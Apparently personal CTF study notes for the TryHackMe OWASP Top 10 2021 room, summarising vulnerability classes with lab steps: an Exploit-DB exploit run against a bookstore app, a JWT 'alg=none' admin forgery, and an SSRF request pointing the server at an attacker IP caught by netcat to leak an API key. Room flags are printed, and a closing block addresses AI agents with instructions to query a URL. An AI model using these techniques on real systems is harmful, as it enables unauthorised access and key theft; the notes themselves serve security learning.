# OWASP Top 10 2021

### Task 3.4 - Broken Access Control (IDOR Challenge)

**Whats is?**

Insecure Direct Object Reference = can access resources you wouldn't ordinarily be able to see.  

***

### Task 5.6.7 - Cryptographic Failures

**What is?**

Cryptographic Failure = misuse (or lack of use) of cryptographic algorithms

**Challenge**

`how to reading .db [database]` 

***

### Task 9.10 - Injection

**SQL Injection**

Occurs when user-controlled input is passed to SQL queries

**Command Injection**

Occurs when user input is passed to system commands

For preventing = using an allow list andStripping input

***

### Task 11 - Insecure Design

**What is?**

Refers to vulnerabilities which are inherent to the application's architecture.

***

### Task 12 - Security Misconfiguration

**What is?**

Distinct from the other Top 10 vulnerabilities, occur when security don't is been appropriately configured.

Include:

* Poorly configured permissions on cloud services, like S3 buckets.
* Having unnecessary features enabled, like services, pages, accounts or privileges.
* Default accounts with unchanged passwords.
* Error messages that are overly detailed and allow attackers to find out more about the system.
* Not using HTTP security headers.

`Werkzeug console, execute Python code:` 

***

### Task 13.14.15 - Vulnerable and Outdated Components

**What is?**

Literally, occasionally, you may find that the company/entity using a program with a well-known vulnerability.

<https://www.exploit-db.com/exploits/41962>

**Exploit**

We have take a version number and a software name for use on [Exploit-DB](https://www.exploit-db.com/).

Sometimes we need fix any bugs or make any modifications of scripts.

**Lab**

`Start`&#x20;

```bash
Php with MySQL database and is a book store CSE.
```

`In ExploitDB:` &#x20;

`Verify`  `Download`&#x20;

`Run`  [Link exploit -> 48960](https://www.exploit-db.com/exploits/48960)

```bash
THM{But_1ts_n0t_my_f4ult!}
```

***

### Task 16.17 - Identification and Authentication Failures

**What is?**

Constitute core components of modern web applications

`Common flaws:`

* Brute force attacks
* Use of weak credentials
* Weak Session Cookies: If session cookies contain predictable values, attackers can set their own session cookies and access users accounts.

`Mitigation:`

* To avoid password-guessing attacks, strong password.
* To avoid brute force attacks, limitations

`Example of 'Basics of attacking the authentication systems':`

```bash
existing user with the name 'darren' and we can access this account with new register how ' darren' [have a space].
```

&#x20; \* \* \*

### Task 18.19.20 - Software and Data Integrity Failures

**What is Integrity?**

Ascertain that a piece of data remains unmodified, **example**: downloading and installing the latest version how we can know that while downloading it wasn't modified or got damaged by a transmission error.

`Hash:`  If we download the file we can recalculate the hashes and compare.

`To calculate and check the hashes in Linux:`

```bash
syntax: md5sum 'file' | [sha1][sha256]sum 'file'`
```

**Software Integrity Failures**

When a website that uses third-party libraries, example:  This content `https://code.jquery.com/jquery-3.6.1.min.js` can change to inject malicious code.

Modern browsers allow specify a hash along the library's URL, Subresource Integrity (SRI).

`How:` In [srihash](https://www.srihash.org/) we can create a URL with hash.

```bash
Ex.: https://code.jquery.com/jquery-1.12.4.min.js -> 
<script src="https://code.jquery.com/jquery-1.12.4.min.js" integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=" crossorigin="anonymous">
</script>
```

**Data Integrity Failures**

Cookies are key-value stored on browsers that if the user tampers with the cookie and changes the username he can access another emails. Solution is JSON Web Tokens (JWT) that provide proof of integrity with cryptography.

`JWTs are very simple tokens`&#x20;

`Lab:`

```bash
In BurpSuit intercept request:
```

```bash
In BurpSuit intercept request:
```

```bash
Cookie Burpsuit:
```

```bash
Exploit [alg= none; user= admin]
```

```bash
Changes:
```

```bash
Response:
```

***

### Task 21 - Security Logging and Monitoring Failures

**Important**

Because in a incident, the attackers activities can be traced and your actions traced, their risk and impact can be determined.

* Risk of further attacks
* Regulatory damage

`Information stored in logs:`

* HTTP status codes
* Time Stamps
* Usernames
* API endpoints/page locations
* IP addresses

***

### Task 22 - Server-Side Request Forgery (SSRF)

**Practical Example**

`Examinee:`  `Link address`&#x20;

`SSRF Request:`&#x20;

```bash
http://10.10.170.123:8087/download?server=10.11.41.161:8000&id=75482342
```

`Netcat:`&#x20;

```bash
Key: THM{Hello_Im_just_an_API_key}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://public-8.gitbook.io/rapha/ctfs/tryhackme/rooms/owasp-top-10-2021.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.